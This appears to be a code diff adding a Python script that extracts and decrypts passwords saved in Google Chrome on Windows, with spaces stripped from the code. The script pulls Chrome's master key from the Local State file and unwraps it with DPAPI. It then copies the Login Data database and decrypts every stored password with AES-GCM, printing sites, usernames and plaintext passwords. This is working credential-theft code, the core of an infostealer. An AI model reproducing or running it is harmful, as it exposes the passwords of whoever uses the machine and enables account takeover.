|
| 1 | +importos |
| 2 | +importjson |
| 3 | +importbase64 |
| 4 | +importsqlite3 |
| 5 | +importwin32crypt |
| 6 | +fromCrypto.CipherimportAES |
| 7 | +importshutil |
| 8 | +fromdatetimeimporttimezone,datetime,timedelta |
| 9 | + |
| 10 | +defget_chrome_datetime(chromedate): |
| 11 | +"""Return a `datetime.datetime` object from a chrome format datetime |
| 12 | + Since `chromedate` is formatted as the number of microseconds since January, 1601""" |
| 13 | +returndatetime(1601,1,1)+timedelta(microseconds=chromedate) |
| 14 | + |
| 15 | +defget_encryption_key(): |
| 16 | +local_state_path=os.path.join(os.environ["USERPROFILE"], |
| 17 | +"AppData","Local","Google","Chrome", |
| 18 | +"User Data","Local State") |
| 19 | +withopen(local_state_path,"r",encoding="utf-8")asf: |
| 20 | +local_state=f.read() |
| 21 | +local_state=json.loads(local_state) |
| 22 | + |
| 23 | +# decode the encryption key from Base64 |
| 24 | +key=base64.b64decode(local_state["os_crypt"]["encrypted_key"]) |
| 25 | +# remove DPAPI str |
| 26 | +key=key[5:] |
| 27 | +# return decrypted key that was originally encrypted |
| 28 | +# using a session key derived from current user's logon credentials |
| 29 | +# doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html |
| 30 | +returnwin32crypt.CryptUnprotectData(key,None,None,None,0)[1] |
| 31 | + |
| 32 | + |
| 33 | +defdecrypt_password(password,key): |
| 34 | +try: |
| 35 | +# get the initialization vector |
| 36 | +iv=password[3:15] |
| 37 | +password=password[15:] |
| 38 | +# generate cipher |
| 39 | +cipher=AES.new(key,AES.MODE_GCM,iv) |
| 40 | +# decrypt password |
| 41 | +returncipher.decrypt(password)[:-16].decode() |
| 42 | +except: |
| 43 | +try: |
| 44 | +returnstr(win32crypt.CryptUnprotectData(password,None,None,None,0)[1]) |
| 45 | +except: |
| 46 | +# not supported |
| 47 | +return"" |
| 48 | + |
| 49 | + |
| 50 | +defmain(): |
| 51 | +# get the AES key |
| 52 | +key=get_encryption_key() |
| 53 | +# local sqlite Chrome database path |
| 54 | +db_path=os.path.join(os.environ["USERPROFILE"],"AppData","Local", |
| 55 | +"Google","Chrome","User Data","default","Login Data") |
| 56 | +# copy the file to another location |
| 57 | +# as the database will be locked if chrome is currently running |
| 58 | +filename="ChromeData.db" |
| 59 | +shutil.copyfile(db_path,filename) |
| 60 | +# connect to the database |
| 61 | +db=sqlite3.connect(filename) |
| 62 | +cursor=db.cursor() |
| 63 | +# `logins` table has the data we need |
| 64 | +cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") |
| 65 | +# iterate over all rows |
| 66 | +forrowincursor.fetchall(): |
| 67 | +origin_url=row[0] |
| 68 | +action_url=row[1] |
| 69 | +username=row[2] |
| 70 | +password=decrypt_password(row[3],key) |
| 71 | +date_created=row[4] |
| 72 | +date_last_used=row[5] |
| 73 | +ifusernameorpassword: |
| 74 | +print(f"Origin URL:{origin_url}") |
| 75 | +print(f"Action URL:{action_url}") |
| 76 | +print(f"Username:{username}") |
| 77 | +print(f"Password:{password}") |
| 78 | +else: |
| 79 | +continue |
| 80 | +ifdate_created!=86400000000anddate_created: |
| 81 | +print(f"Creation date:{str(get_chrome_datetime(date_created))}") |
| 82 | +ifdate_last_used!=86400000000anddate_last_used: |
| 83 | +print(f"Last Used:{str(get_chrome_datetime(date_last_used))}") |
| 84 | +print("="*50) |
| 85 | + |
| 86 | +cursor.close() |
| 87 | +db.close() |
| 88 | +try: |
| 89 | +# try to remove the copied db file |
| 90 | +os.remove(filename) |
| 91 | +except: |
| 92 | +pass |
| 93 | + |
| 94 | + |
| 95 | +if__name__=="__main__": |
| 96 | +main() |